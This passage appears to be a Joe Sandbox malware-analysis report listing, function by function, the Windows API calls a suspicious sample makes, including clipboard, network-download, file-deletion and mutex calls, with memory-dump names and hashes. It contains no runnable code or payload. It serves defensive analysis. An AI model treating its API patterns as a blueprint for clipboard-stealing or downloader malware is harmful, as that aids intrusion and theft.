CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64
String ID:
API String ID: 3633153638-0
Opcode ID: 8a998f37e2fdfa1236df407c507618b580ad2237984d28e137e7136215b29367
Instruction ID: da510b3d9ffa379573faa06878c0c8ef6beda39721bab1564d5671ccf652dcc3
Opcode Fuzzy Hash: 8a998f37e2fdfa1236df407c507618b580ad2237984d28e137e7136215b29367
Instruction Fuzzy Hash: 7C813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544116FB5947AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400380B9, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 4a35f555f2975b375653c7a3ff067327758057e3e12b4cfece85c44db6b3376c
Instruction ID: 29dd404f60f48d5f99b1dc5af7256f7acaf721eef24dcbaf8b7095fac6f2dc8b
Opcode Fuzzy Hash: 4a35f555f2975b375653c7a3ff067327758057e3e12b4cfece85c44db6b3376c
Instruction Fuzzy Hash: 29813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400380D3, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 6df3cb06e28922eb3905228710a6288ec4946629e66ec84b7458dd265a49c37d
Instruction ID: 6aba0c7c8afc0dadd3237077b17579cf55288d3d54cc291d73ba965750c60869
Opcode Fuzzy Hash: 6df3cb06e28922eb3905228710a6288ec4946629e66ec84b7458dd265a49c37d
Instruction Fuzzy Hash: 97813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400380ED, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: bbc6622e5aeaad833a4e897c6d15f019b8f1ce7001faaaadb508107a2508b1b2
Instruction ID: ad0cf5c3f941066eba57e2fe631985fc5696e0107bb60b59f150cdc0fe6c12e5
Opcode Fuzzy Hash: bbc6622e5aeaad833a4e897c6d15f019b8f1ce7001faaaadb508107a2508b1b2
Instruction Fuzzy Hash: DD813931604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036644, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004D200: SendMessageTimeoutW.USER32 ref: 000000014004D3AC

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: db27e6ecbd3b67cca6d281e0d2d247b0278b1f5541c3accbab05ef461dd2b3b2
Instruction ID: 4abc409d21fafa2d938ab0043986c73897adcbd6609f16d6bc1bd75616c4a2d8
Opcode Fuzzy Hash: db27e6ecbd3b67cca6d281e0d2d247b0278b1f5541c3accbab05ef461dd2b3b2
Instruction Fuzzy Hash: 39813C31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB59876F5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003681D, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9a28df70fbdf290dd78cd4ddb30b0f173d2bfb47a90d23c62d55db63974eb527
Instruction ID: 7855b7bb2eeb03b3c973113677e8cc8557b52dedb264e7eb657bdefe72725fc5
Opcode Fuzzy Hash: 9a28df70fbdf290dd78cd4ddb30b0f173d2bfb47a90d23c62d55db63974eb527
Instruction Fuzzy Hash: DD813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035DA7, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014007D8A0: _wcstoi64.LIBCMT ref: 000000014007D904
Part of subcall function 000000014007D8A0: InternetOpenW.WININET ref: 000000014007D979
Part of subcall function 000000014007D8A0: InternetOpenUrlW.WININET ref: 000000014007D99C
Part of subcall function 000000014007D8A0: InternetCloseHandle.WININET ref: 000000014007D9AD

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountInternetTick$CloseOpen$ClipboardGlobalHandleMessagePeekUnlock_wcstoi64
String ID:
API String ID: 2751744677-0
Opcode ID: c3bda5223e949a7ecdb8972e57aa600a6df6d593daf1f7a4f8245ab1bb735fce
Instruction ID: 38e4ad7461510981b81c8f150c49d8a1c2bdcc5a3b46700065ea4fcc9f0ff4e0
Opcode Fuzzy Hash: c3bda5223e949a7ecdb8972e57aa600a6df6d593daf1f7a4f8245ab1bb735fce
Instruction Fuzzy Hash: 6C813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036ECF, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005E940: wcsncpy.LIBCMT ref: 000000014005E984
Part of subcall function 000000014005E940: GetDiskFreeSpaceExW.KERNEL32 ref: 000000014005E9E5

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseDiskFreeGlobalMessagePeekSpaceUnlockwcsncpy
String ID:
API String ID: 833027430-0
Opcode ID: d3ee416d11c09b8a4ae4f72ba9e9b490bec57b45befe560debef2eabf907810c
Instruction ID: 553a405e31f4a0dc1c5e33571b45230c2ae121a4f21791e8b85100b0ea32cd75
Opcode Fuzzy Hash: d3ee416d11c09b8a4ae4f72ba9e9b490bec57b45befe560debef2eabf907810c
Instruction Fuzzy Hash: A7813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036F08, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 5fcaa9c066c759f5076e414069b735407fe929ae97d5a42c64cbe56ca920e950
Instruction ID: 5c876327cc72e0f3f29ca1cdddd2924e357b27ad00b954d6ccffc1c2512b7eae
Opcode Fuzzy Hash: 5fcaa9c066c759f5076e414069b735407fe929ae97d5a42c64cbe56ca920e950
Instruction Fuzzy Hash: 67813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003807D, Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Part of subcall function 000000014000A540: PostThreadMessageW.USER32 ref: 000000014000A5C1
Part of subcall function 000000014000A540: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000A5CE
Part of subcall function 000000014000A540: GetTickCount.KERNEL32 ref: 000000014000A5DE
Part of subcall function 000000014000A540: GetExitCodeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000A5FF
Part of subcall function 000000014000A540: GetTickCount.KERNEL32 ref: 000000014000A612
Part of subcall function 000000014000A540: Sleep.KERNEL32 ref: 000000014000A623
Part of subcall function 000000014000A540: CloseHandle.KERNEL32 ref: 000000014000A632
Part of subcall function 000000014000A540: CreateMutexW.KERNEL32 ref: 000000014000A65D
Part of subcall function 000000014000A540: CreateMutexW.KERNEL32 ref: 000000014000A69F

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$CloseCreateMessageMutexSleepThread$ClipboardCodeExitGlobalHandlePeekPostUnlock
String ID:
API String ID: 4035754557-0
Opcode ID: 2cb5493f1a6bafe6eb580055fbaceb3c5a35c5bba7ac4a4a36394ee5afcefd85
Instruction ID: 7ce1cb728a96b09f63c3bd7e9f92de065b0131278a93bc5dfe2f733907a5d6a0
Opcode Fuzzy Hash: 2cb5493f1a6bafe6eb580055fbaceb3c5a35c5bba7ac4a4a36394ee5afcefd85
Instruction Fuzzy Hash: 98814B31604B4486FB6B8B27E8443EA77A2F78DBE4F544216EB59476F6DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003708D, Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: d3cda11b9381bcfa88eb393704b2b6e5c2940d0d596bbeb5f06165a2f1f0a46d
Instruction ID: ed0c2af0e71dd75dc7f1e453c784fcddf386cbc4ba9b2d8ef63401e8e3072f6e
Opcode Fuzzy Hash: d3cda11b9381bcfa88eb393704b2b6e5c2940d0d596bbeb5f06165a2f1f0a46d
Instruction Fuzzy Hash: 37813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400370BC, Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140065D90: SetLastError.KERNEL32 ref: 0000000140065DFA
Part of subcall function 0000000140065D90: DeleteFileW.KERNEL32 ref: 0000000140065E03
Part of subcall function 0000000140065D90: GetLastError.KERNEL32 ref: 0000000140065E0E

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ErrorLast$ClipboardCloseDeleteFileGlobalMessagePeekUnlock
String ID:
API String ID: 3770565981-0
Opcode ID: a7c56f7efb72b2dd255e4fb87096636a1021718c5e7a8913a8ce9e33a525cebc
Instruction ID: 9dcdd0168b16ca49a8e5f8af9d6ff8d8c18e4b19f99903745c7f567dd2a2250d
Opcode Fuzzy Hash: a7c56f7efb72b2dd255e4fb87096636a1021718c5e7a8913a8ce9e33a525cebc
Instruction Fuzzy Hash: ED813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400370D0, Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140080140: GetFullPathNameW.KERNEL32 ref: 0000000140080179
Part of subcall function 0000000140080140: SHFileOperationW.SHELL32 ref: 00000001400801F1

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseFileFullGlobalMessageNameOperationPathPeekUnlock
String ID:
API String ID: 1286959346-0
Opcode ID: bb8987fe031b948c033f4717a46debebad56f6670ceeec44d04c7e65671c7c25
Instruction ID: e33556675c552dd3edca8b0ae113fdeb1b6e2f16c3eac416e9a8eeed8001e2d9
Opcode Fuzzy Hash: bb8987fe031b948c033f4717a46debebad56f6670ceeec44d04c7e65671c7c25
Instruction Fuzzy Hash: 29813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036D42, Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005E250: GetKeyboardLayout.USER32 ref: 000000014005E278

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalKeyboardLayoutMessagePeekUnlock
String ID:
API String ID: 2243892272-0
Opcode ID: f48bcfb16da020f79ab92f6760a380de56ebab94d94bdb13dd4666638034a1d1
Instruction ID: 723cc532fe399c0620fca84a0f9c8e6cf512674f7db100b7f4426b71abf1cb01
Opcode Fuzzy Hash: f48bcfb16da020f79ab92f6760a380de56ebab94d94bdb13dd4666638034a1d1
Instruction Fuzzy Hash: 6F813931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003616B, Relevance: 9.2, APIs: 6, Instructions: 170windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 840ed05a1954207a951f37aa6ed649cb72f353d2d4e323712e6bbe947e5245ca
Instruction ID: 06dff3d2993d034b20ff94198235f023606134cc5e9cc7a762992d2190d98af0
Opcode Fuzzy Hash: 840ed05a1954207a951f37aa6ed649cb72f353d2d4e323712e6bbe947e5245ca
Instruction Fuzzy Hash: 0F813C31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038107, Relevance: 9.2, APIs: 6, Instructions: 167windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

